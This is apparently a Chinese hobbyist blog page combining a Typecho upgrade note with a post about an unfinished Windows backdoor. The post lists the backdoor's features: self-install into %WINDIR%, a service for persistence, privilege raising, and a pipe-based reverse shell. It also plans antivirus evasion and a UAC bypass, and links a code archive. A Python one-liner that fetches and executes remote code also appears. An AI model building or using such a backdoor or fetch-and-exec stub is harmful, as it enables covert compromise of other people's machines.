⑨BIE

更新了下typecho版本
旧版的typecho竟然不支持新版的php。。
以及我这个远古主题有些函数typecho竟然也不支持了
稍微暴力修改了下，还算能用吧。
要开学了，好忙呀

预计分为Win版和linux版本。
并没有什么卵用的工具包，也不一定是自己写的，也许是收集的。
什么时候完成我也不知道。反正目前就这样开着就是了。

exec(__import__('urllib').urlopen('').read())

<font color="red" size="10">未完成版</font>
别问我为啥要用红色加粗字体（我只是想试试在博客上的效果hhhh
闲着无聊弄得这个，并没有什么技术含量
其中远程匿名管道是直接调用cmd.exe的，个人推荐不这么做。
最低限度的话也得把cmd复制到其他路径，否则直接请求cmd进程是个很敏感的动作。

目前已完成

• 自动释放到%WINDIR%目录下
• 安装服务自启
• 提升进程权限
• 双向匿名管道反弹shell

目前未完成

• 入口点Main改成WinMain，隐藏第一次运行的命令行窗口
• 修改反弹连接方式，改为触发形连接，目前这套是过不了启发引擎和主动防御的
• 添加UAC，自动申请UAC权限/bypassUAC
• 使用之前的一篇文章进行绕过云查杀

代码在这：my.rar